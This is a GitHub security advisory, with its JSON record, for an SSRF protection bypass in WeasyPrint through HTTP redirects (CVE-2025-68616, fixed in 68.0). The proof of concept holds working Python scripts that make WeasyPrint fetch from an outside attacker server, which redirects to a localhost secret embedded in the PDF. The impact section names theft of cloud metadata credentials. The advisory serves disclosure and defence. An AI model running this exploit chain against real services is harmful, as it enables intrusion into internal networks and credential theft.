GHSA-983W-RHVV-GWMV
Vulnerability from github – Published: 2026-01-20 16:29 – Updated: 2026-01-20 16:29Summary
A Server-Side Request Forgery (SSRF) Protection Bypass exists in WeasyPrint's default_url_fetcher. The vulnerability allows attackers to access internal network resources (such as localhost services or cloud metadata endpoints) even when a developer has implemented a custom url_fetcher to block such access. This occurs because the underlying urllib library follows HTTP redirects automatically without re-validating the new destination against the developer's security policy.
Details
The default URL fetching mechanism in WeasyPrint (default_url_fetcher in weasyprint/urls.py) is vulnerable to a Server-Side Request Forgery (SSRF) Protection Bypass.
While WeasyPrint allows developers to define custom url_fetcher functions to validate or sanitize URLs before fetching (e.g., blocking internal IP addresses or specific ports), the underlying implementation uses Python's standard urllib.request.urlopen. By default, urllib automatically follows HTTP redirects (status codes 301, 302, 307, etc.) without returning control to the developer's validation logic for the new target URL.
This behavior creates a Time-of-Check to Time-of-Use (TOCTOU) vulnerability. An attacker can provide a URL that passes the developer's allowlist/blocklist (the Check) but immediately redirects to a blocked internal resource (the Use).
PoC
To reproduce this vulnerability, use the following setup. This scenario simulates a developer attempting to blacklist access to internal hostnames (e.g., localhost).
1. victim.py (Internal Service - Port 5000) Simulates a sensitive internal service running on localhost.
from flask import Flask
app = Flask(__name__)
@app.route('/secret')
def secret():
return "CRITICAL_INTERNAL_DATA"
if __name__ == '__main__':
# Listens on localhost:5000
app.run(port=5000)
2. attacker.py (External Redirector - Port 1337)
Simulates an external server. It accepts a request and redirects it to the blocked hostname (localhost).
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/image.png')
def malicious():
# The vulnerability: Redirects to the BLOCKED hostname
return redirect("http://localhost:5000/secret", code=302)
if __name__ == '__main__':
app.run(port=1337)
3. exploit.py (Vulnerable Implementation) Simulates the application with a security filter intended to block access to "localhost".
from weasyprint import HTML, default_url_fetcher
import logging
# Security Filter: Intended to block internal hostnames
def secure_fetcher(url):
# Simulates a blacklist for 'localhost'
if "localhost" in url:
raise PermissionError(f"Security Block: Access to {url} denied.")
print(f"[ALLOWED] Initial URL check passed for: {url}")
return default_url_fetcher(url)
# EXPLOIT LOGIC:
# 1. We access the attacker via '127.0.0.1' (or an external IP).
# The string "127.0.0.1" passes the check because it is not "localhost".
# 2. The attacker redirects to "http://localhost:5000/...".
# 3. urllib follows the redirect to 'localhost' without re-triggering secure_fetcher.
try:
# Use 127.0.0.1 to bypass the string check for 'localhost'
html_content = '<link rel="attachment" href="http://54.234.88.160:1337/image.png">'
doc = HTML(string=html_content, url_fetcher=secure_fetcher)
doc.write_pdf("exploit.pdf")
print("Exploit successful. The 'localhost' block was bypassed via redirect.")
print("Check exploit.pdf for 'CRITICAL_INTERNAL_DATA'.")
except Exception as e:
print(f"Exploit failed: {e}")
4. Attacker read attachment in PDF
➜ pdfdetach -list resultado_exploit.pdf
1 embedded files
1: secret
➜ pdfdetach -saveall resultado_exploit.pdf
➜ cat secret
CRITICAL_INTERNAL_DATA
Evidence
Impact
This vulnerability impacts any application or SaaS platform using WeasyPrint to render user-supplied HTML/CSS that attempts to restrict external resource loading.
- Internal Network Reconnaissance: Attackers can bypass firewalls or allowlists to scan and access internal services (e.g., Redis, ElasticSearch, Admin Panels) running on the loopback interface or local network.
- Cloud Metadata Exfiltration: In cloud environments, attackers can redirect requests to metadata services (e.g.,
http://169.254.169.254) to steal instance credentials and escalate privileges. - Security Control Bypass: It renders the
url_fetchersecurity validation logic ineffective against sophisticated attacks, creating a false sense of security for developers.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "weasyprint"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "68.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68616"
],
"database_specific": {
"cwe_ids": [
"CWE-601",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-20T16:29:53Z",
"nvd_published_at": "2026-01-19T16:15:53Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA **Server-Side Request Forgery (SSRF) Protection Bypass** exists in WeasyPrint\u0027s `default_url_fetcher`. The vulnerability allows attackers to access internal network resources (such as `localhost` services or cloud metadata endpoints) even when a developer has implemented a custom `url_fetcher` to block such access. This occurs because the underlying `urllib` library follows HTTP redirects automatically without re-validating the new destination against the developer\u0027s security policy.\n\n### Details\n\nThe default URL fetching mechanism in WeasyPrint (default_url_fetcher in weasyprint/urls.py) is vulnerable to a Server-Side Request Forgery (SSRF) Protection Bypass.\n\nWhile WeasyPrint allows developers to define custom url_fetcher functions to validate or sanitize URLs before fetching (e.g., blocking internal IP addresses or specific ports), the underlying implementation uses Python\u0027s standard urllib.request.urlopen. By default, urllib automatically follows HTTP redirects (status codes 301, 302, 307, etc.) without returning control to the developer\u0027s validation logic for the new target URL.\n\nThis behavior creates a Time-of-Check to Time-of-Use (TOCTOU) vulnerability. An attacker can provide a URL that passes the developer\u0027s allowlist/blocklist (the Check) but immediately redirects to a blocked internal resource (the Use).\n\n### PoC\n\nTo reproduce this vulnerability, use the following setup. This scenario simulates a developer attempting to blacklist access to internal hostnames (e.g., `localhost`).\n\n**1. victim.py (Internal Service - Port 5000)**\nSimulates a sensitive internal service running on localhost.\n\n```python\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route(\u0027/secret\u0027)\ndef secret():\n return \"CRITICAL_INTERNAL_DATA\"\n\nif __name__ == \u0027__main__\u0027:\n # Listens on localhost:5000\n app.run(port=5000)\n```\n\n**2. attacker.py (External Redirector - Port 1337)**\nSimulates an external server. It accepts a request and redirects it to the blocked hostname (`localhost`).\n\n```python\nfrom flask import Flask, redirect\napp = Flask(__name__)\n\n@app.route(\u0027/image.png\u0027)\ndef malicious():\n # The vulnerability: Redirects to the BLOCKED hostname\n return redirect(\"http://localhost:5000/secret\", code=302)\n\nif __name__ == \u0027__main__\u0027:\n app.run(port=1337)\n```\n\n**3. exploit.py (Vulnerable Implementation)**\nSimulates the application with a security filter intended to block access to \"localhost\".\n\n```python\nfrom weasyprint import HTML, default_url_fetcher\nimport logging\n\n# Security Filter: Intended to block internal hostnames\ndef secure_fetcher(url):\n # Simulates a blacklist for \u0027localhost\u0027\n if \"localhost\" in url:\n raise PermissionError(f\"Security Block: Access to {url} denied.\")\n \n print(f\"[ALLOWED] Initial URL check passed for: {url}\")\n return default_url_fetcher(url)\n\n# EXPLOIT LOGIC:\n# 1. We access the attacker via \u0027127.0.0.1\u0027 (or an external IP). \n# The string \"127.0.0.1\" passes the check because it is not \"localhost\".\n# 2. The attacker redirects to \"http://localhost:5000/...\".\n# 3. urllib follows the redirect to \u0027localhost\u0027 without re-triggering secure_fetcher.\n\ntry:\n # Use 127.0.0.1 to bypass the string check for \u0027localhost\u0027\n html_content = \u0027\u003clink rel=\"attachment\" href=\"http://54.234.88.160:1337/image.png\"\u003e\u0027\n \n doc = HTML(string=html_content, url_fetcher=secure_fetcher)\n doc.write_pdf(\"exploit.pdf\")\n \n print(\"Exploit successful. The \u0027localhost\u0027 block was bypassed via redirect.\")\n print(\"Check exploit.pdf for \u0027CRITICAL_INTERNAL_DATA\u0027.\")\nexcept Exception as e:\n print(f\"Exploit failed: {e}\")\n```\n**4. Attacker read attachment in PDF**\n```\n\u279c pdfdetach -list resultado_exploit.pdf\n1 embedded files\n1: secret\n\u279c pdfdetach -saveall resultado_exploit.pdf\n\u279c cat secret\nCRITICAL_INTERNAL_DATA\n```\n**Evidence**\n\u003cimg width=\"1514\" height=\"436\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f7881694-be4d-4c63-8bca-2b220e4c87f9\" /\u003e\n\n### Impact\n\nThis vulnerability impacts any application or SaaS platform using WeasyPrint to render user-supplied HTML/CSS that attempts to restrict external resource loading.\n\n * **Internal Network Reconnaissance:** Attackers can bypass firewalls or allowlists to scan and access internal services (e.g., Redis, ElasticSearch, Admin Panels) running on the loopback interface or local network.\n * **Cloud Metadata Exfiltration:** In cloud environments, attackers can redirect requests to metadata services (e.g., `http://169.254.169.254`) to steal instance credentials and escalate privileges.\n * **Security Control Bypass:** It renders the `url_fetcher` security validation logic ineffective against sophisticated attacks, creating a false sense of security for developers.",
"id": "GHSA-983w-rhvv-gwmv",
"modified": "2026-01-20T16:29:54Z",
"published": "2026-01-20T16:29:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-983w-rhvv-gwmv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68616"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/WeasyPrint/commit/b6a14f0f3f4ce9c0c75c1a2d73cb1c5d43f0e565"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kozea/WeasyPrint"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "WeasyPrint has a Server-Side Request Forgery (SSRF) Protection Bypass via HTTP Redirect"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.